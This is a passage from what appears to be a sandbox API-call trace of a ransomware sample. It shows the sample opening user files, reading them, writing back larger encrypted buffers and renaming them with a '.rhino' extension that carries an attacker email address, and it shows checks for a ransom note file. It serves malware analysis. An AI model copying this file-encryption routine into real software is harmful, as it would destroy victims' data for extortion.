Size=0x6) returned 0x72b7f8 [0086.269] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.269] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0086.270] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.270] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0086.270] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0086.270] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0086.270] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0086.270] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0086.270] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0086.270] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0086.270] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0086.270] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0086.270] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.270] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x72a920 [0086.270] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.270] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x74a728 [0086.270] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.270] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x74a9b8 [0086.270] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74a728 | out: hHeap=0x6d0000) returned 1 [0086.270] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x74aa98 [0086.270] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74a9b8 | out: hHeap=0x6d0000) returned 1 [0086.271] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x74abe0 [0086.342] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74aa98 | out: hHeap=0x6d0000) returned 1 [0086.342] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x74adc8 [0086.342] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74abe0 | out: hHeap=0x6d0000) returned 1 [0086.342] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x74b098 [0086.342] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74adc8 | out: hHeap=0x6d0000) returned 1 [0086.342] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x74a9b8 [0086.342] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74b098 | out: hHeap=0x6d0000) returned 1 [0086.342] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x74b000 [0086.342] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74a9b8 | out: hHeap=0x6d0000) returned 1 [0086.342] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75ef78 [0086.342] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74b000 | out: hHeap=0x6d0000) returned 1 [0086.343] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x74a9b8 [0086.343] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.343] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x75ef78 [0086.343] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74a9b8 | out: hHeap=0x6d0000) returned 1 [0086.343] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x760f40 [0086.343] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.343] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x763ed8 [0086.343] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760f40 | out: hHeap=0x6d0000) returned 1 [0086.346] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x72bfe8 [0086.347] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763ed8 | out: hHeap=0x6d0000) returned 1 [0086.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x75ef78 [0086.348] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0086.348] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x72bfe8 [0086.348] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.349] WriteFile (in: hFile=0xec, lpBuffer=0x72c000*, nNumberOfBytesToWrite=0xe75f, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x72c000*, lpNumberOfBytesWritten=0x2cfa04*=0xe75f, lpOverlapped=0x0) returned 1 [0086.349] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0086.349] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xe75f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0086.349] CloseHandle (hObject=0xec) returned 1 [0086.352] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x72a920 [0086.352] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x74a728 [0086.352] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.352] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\C8yKV.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\c8ykv.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\C8yKV.rtf.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\c8ykv.rtf.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0086.353] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74a728 | out: hHeap=0x6d0000) returned 1 [0086.353] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74a830 | out: hHeap=0x6d0000) returned 1 [0086.353] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0086.353] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0086.353] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0086.353] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0086.353] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0086.353] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0086.354] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.354] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.354] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CgDtuQ2FH3A.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cgdtuq2fh3a.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0086.354] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x14b51 [0086.354] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x14c71, nNumberOfBytesToLockHigh=0x0) returned 1 [0086.354] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.354] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0086.355] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.356] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x14b51, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x14b51, lpOverlapped=0x0) returned 1 [0086.357] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0086.357] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.357] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0086.357] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0086.357] GetLastError () returned 0x0 [0086.357] SetLastError (dwErrCode=0x0) [0086.357] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.357] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14b74) returned 0x70a650 [0086.360] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.360] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x71f1d0 [0086.361] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x71f2d8 [0086.361] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71f1d0 | out: hHeap=0x6d0000) returned 1 [0086.361] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.361] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0086.361] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0086.361] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.361] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0086.361] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.361] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0086.361] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.361] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0086.361] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.361] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0086.361] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.361] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0086.361] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0086.361] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0086.361] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0086.361] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0086.361] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0086.362] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0086.362] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0086.362] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0086.362] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.362] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0086.362] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.362] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x71f1d0 [0086.362] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0086.362] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x71f460 [0086.362] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71f1d0 | out: hHeap=0x6d0000) returned 1 [0086.362] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x71f540 [0086.362] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71f460 | out: hHeap=0x6d0000) returned 1 [0086.362] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x71f688 [0086.362] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71f540 | out: hHeap=0x6d0000) returned 1 [0086.362] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x71f870 [0086.362] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71f688 | out: hHeap=0x6d0000) returned 1 [0086.362] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x71fb40 [0086.362] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71f870 | out: hHeap=0x6d0000) returned 1 [0086.362] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x71f460 [0086.362] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71fb40 | out: hHeap=0x6d0000) returned 1 [0086.365] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x71faa8 [0086.365] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71f460 | out: hHeap=0x6d0000) returned 1 [0086.365] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x720410 [0086.365] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71faa8 | out: hHeap=0x6d0000) returned 1 [0086.365] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x721228 [0086.366] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x720410 | out: hHeap=0x6d0000) returned 1 [0086.366] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x722768 [0086.366] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721228 | out: hHeap=0x6d0000) returned 1 [0086.366] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x71f460 [0086.366] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722768 | out: hHeap=0x6d0000) returned 1 [0086.366] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x7223f8 [0086.366] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71f460 | out: hHeap=0x6d0000) returned 1 [0086.366] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x75ef78 [0086.367] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7223f8 | out: hHeap=0x6d0000) returned 1 [0086.368] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x71f460 [0086.368] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.368] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x73c0b8 [0086.369] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71f460 | out: hHeap=0x6d0000) returned 1 [0086.370] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x781f78 [0086.372] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0086.372] WriteFile (in: hFile=0xec, lpBuffer=0x781f80*, nNumberOfBytesToWrite=0x14c71, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x781f80*, lpNumberOfBytesWritten=0x2cfa04*=0x14c71, lpOverlapped=0x0) returned 1 [0086.373] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x781f78 | out: hHeap=0x6d0000) returned 1 [0086.373] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x14c71, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0086.373] CloseHandle (hObject=0xec) returned 1 [0086.377] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x71f1d0 [0086.377] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d698 [0086.377] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71f1d0 | out: hHeap=0x6d0000) returned 1 [0086.377] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CgDtuQ2FH3A.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cgdtuq2fh3a.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CgDtuQ2FH3A.ppt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cgdtuq2fh3a.ppt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0086.433] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d698 | out: hHeap=0x6d0000) returned 1 [0086.433] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71f2d8 | out: hHeap=0x6d0000) returned 1 [0086.433] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0086.433] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0086.433] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.433] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0086.433] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0086.434] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.434] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.434] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.434] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EpNbVP.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\epnbvp.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0086.434] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x4b91 [0086.434] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x4cb1, nNumberOfBytesToLockHigh=0x0) returned 1 [0086.435] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.435] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0086.436] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.437] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x4b91, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x4b91, lpOverlapped=0x0) returned 1 [0086.437] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0086.437] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.437] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0086.437] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0086.437] GetLastError () returned 0x0 [0086.437] SetLastError (dwErrCode=0x0) [0086.438] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.438] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4bb4) returned 0x75ef78 [0086.438] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.438] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x763b38 [0086.438] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x763c40 [0086.438] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763b38 | out: hHeap=0x6d0000) returned 1 [0086.438] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.438] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0086.438] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0086.438] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.438] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0086.439] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.439] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0086.439] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.439] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0086.439] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.439] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0086.439] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.439] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0086.439] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0086.439] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0086.439] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0086.439] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0086.439] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0086.439] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0086.439] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0086.439] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0086.439] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.439] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x72a920 [0086.440] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.440] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x763b38 [0086.440] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.440] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x763dc8 [0086.440] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763b38 | out: hHeap=0x6d0000) returned 1 [0086.440] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x763ea8 [0086.440] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763dc8 | out: hHeap=0x6d0000) returned 1 [0086.440] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x763ff0 [0086.440] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763ea8 | out: hHeap=0x6d0000) returned 1 [0086.440] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x7641d8 [0086.440] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763ff0 | out: hHeap=0x6d0000) 